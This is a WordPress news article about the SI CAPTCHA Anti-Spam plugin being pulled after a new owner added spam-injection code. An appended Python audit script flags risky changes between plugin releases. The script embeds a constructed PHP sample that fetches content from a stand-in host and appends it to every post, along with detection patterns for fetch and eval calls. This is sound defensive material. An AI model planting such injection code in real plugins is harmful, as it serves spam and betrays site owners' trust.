WPTavern: SI CAPTCHA Anti-Spam Plugin Permanently Removed from WordPress.org Due to Spam Code

The SI CAPTCHA Anti-Spam plugin has been removed from the WordPress Directory due to its author including spam code. The plugin added a CAPTCHA image test to WordPress forms to prevent spam and was compatible with forms generated by bbPress, BuddyPress, Jetpack, and WooCommerce. It had more than 300,000 active installs at the time of removal.

Mike Challis, the original author of the plugin, said that a WordPress.org user named “fastsecure” became the new owner of SI CAPTCHA Anti-Spam in June 2017. Challis was not aware of the new owner’s plans for the plugin but posted a notice on the WordPress.org support forums to inform users about why it was removed.

“The new owner attempted to put code in several of his newly acquired WordPress plugins that would connect to a 3rd party server he also owned and place spam ads for payday loans and such in the WP posts,” Challis said. He also linked the incident to a ring of WordPress plugins that researchers at Wordfence say were part of a coordinated spam campaign. Display Widgets, one of the most notable plugins in this group, was recently permanently removed from WordPress.org for a series of violations wherein the author had injected malicious code.

Challis said the injected code never displayed any spam on sites because of where it was placed in the plugin, but that it could have been activated at a later time:

The new owner put spam code in versions 3.0.1 and 3.0.2 but it failed to display any spam because he put the code in the secureimage.php file. The malicious code required WordPress libraries to also be loaded to execute. The reason the spam code did not do anything at all is because the secureimage.php file is not included in the WordPress run time environment. The secureimage.php file is included from another file securimage_show.php that loads the captcha image directly from html img src outside of the WordPress run time. The spam code in this plugin was never activated; it would not have corrupted your posts or changed anything in the WordPress database.

SI CAPTCHA Anti-Spam users who still have the plugin installed may see an update available in the WordPress admin. Plugin team member Samuel (Otto) Wood removed the malicious code and released 3.0.3 as a clean version that is a safe update for users who still rely on the plugin. Wood recommends users find an alternative, because SI CAPTCHA Anti-Spam will not be re-listed in the directory or receive any future updates.

The incident is another reminder for users to be on alert when WordPress.org plugins change hands, as buyers do not always disclose their actual intentions for the plugin. Users in search of a replacement for SI CAPTCHA Anti-Spam will find many options on WordPress.org. AntiSpam by CleanTalk, Simple Google reCAPTCHA, and CAPTCHA Code are a few examples that may work as replacements, depending on which other plugins you need the anti-spam capabilities to support.
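
As an added example (it is not code from the article, from WPTavern, or from the plugin itself), the following Python script shows the kind of check a site owner can run when a plugin changes hands: it diffs two releases file by file and reports any newly introduced outbound-connection calls and content-injection hooks, which is the combination Challis describes (code that connects to a third-party server and places ads in posts). It also notes whether each file carries the usual `ABSPATH` direct-access guard, since a file that is fetched directly, as `securimage_show.php` is via an `img src`, does not run inside the WordPress runtime. The plugin source embedded below is constructed for the example and only mirrors the file names in the quote; the `si_fetch_ads` function and the `ads.example.invalid` URL are hypothetical.

```python
import re
from typing import Dict, Set

# Constructed sample: a trimmed "before" release of a hypothetical plugin.
# These files are illustrative text, not the real SI CAPTCHA Anti-Spam source.
OLD_RELEASE: Dict[str, str] = {
    "si-captcha.php": """<?php
if ( ! defined( 'ABSPATH' ) ) { exit; }
add_action( 'init', 'si_captcha_init' );
function si_captcha_init() { /* register the CAPTCHA form fields */ }
""",
    "securimage_show.php": """<?php
// Requested directly by <img src="...securimage_show.php">, outside WordPress.
require_once dirname( __FILE__ ) . '/securimage.php';
$img = new Securimage();
$img->show();
""",
    "securimage.php": """<?php
class Securimage {
    public function show() { /* render the CAPTCHA image */ }
}
""",
}

# The "after" release: identical except for code appended to securimage.php.
# The appended block is hypothetical, modelled on the behaviour the article describes.
NEW_RELEASE: Dict[str, str] = dict(OLD_RELEASE)
NEW_RELEASE["securimage.php"] = OLD_RELEASE["securimage.php"] + """
function si_fetch_ads() {
    $ch = curl_init( 'http://ads.example.invalid/feed' );   // hypothetical host
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
    return curl_exec( $ch );
}
if ( function_exists( 'add_filter' ) ) {   // only does anything when WordPress is loaded
    add_filter( 'the_content', function ( $content ) {
        return $content . si_fetch_ads();
    } );
}
"""

# Primitives that let plugin code pull content from a server the author controls.
REMOTE_FETCH = re.compile(
    r"\b(curl_init|curl_exec|wp_remote_get|wp_remote_post|fsockopen)\s*\("
    r"|\b(file_get_contents)\s*\(\s*['\"]https?://"
)
# Places where fetched content can be written into rendered posts or the database.
CONTENT_SINK = re.compile(
    r"add_filter\s*\(\s*['\"](the_content|the_excerpt)['\"]"
    r"|\b(wp_insert_post|wp_update_post|eval)\s*\("
)
# The conventional guard that stops a file from running when requested directly.
ABSPATH_GUARD = re.compile(r"defined\s*\(\s*['\"]ABSPATH['\"]\s*\)")


def matches(src: str, pattern: "re.Pattern[str]") -> Set[str]:
    """Return the distinct call or hook names a pattern matches in PHP source text."""
    return {next(g for g in m.groups() if g) for m in pattern.finditer(src)}


def audit_update(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, dict]:
    """Compare two releases file by file and report risky calls the new one introduces.

    A file that gains both an outbound fetch and a content sink in one update is
    flagged "high"; either alone is "medium"; nothing new is "none".
    """
    report: Dict[str, dict] = {}
    for path, src in new.items():
        before = old.get(path, "")  # a file added in the new release diffs against nothing
        new_fetch = sorted(matches(src, REMOTE_FETCH) - matches(before, REMOTE_FETCH))
        new_sinks = sorted(matches(src, CONTENT_SINK) - matches(before, CONTENT_SINK))
        if new_fetch and new_sinks:
            risk = "high"
        elif new_fetch or new_sinks:
            risk = "medium"
        else:
            risk = "none"
        report[path] = {
            "new_remote_fetch": new_fetch,
            "new_content_sinks": new_sinks,
            # Without this guard the file can be requested directly, outside the
            # WordPress runtime, where WordPress hooks and functions do not exist.
            "abspath_guard": bool(ABSPATH_GUARD.search(src)),
            "risk": risk,
        }
    return report


if __name__ == "__main__":
    for path, finding in audit_update(OLD_RELEASE, NEW_RELEASE).items():
        print(f"{path}: risk={finding['risk']} abspath_guard={finding['abspath_guard']} "
              f"new_fetch={finding['new_remote_fetch']} new_sinks={finding['new_content_sinks']}")
```

Run against a real update, the two dictionaries would be filled from the previous trusted release and the freshly downloaded one (for example by unzipping both into memory). The pattern lists are deliberately short and will miss obfuscated code, so treat a "high" finding as a reason to read the diff, not as proof of compromise, and a "none" result as no more than the absence of the obvious pattern.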

Source: WordPress
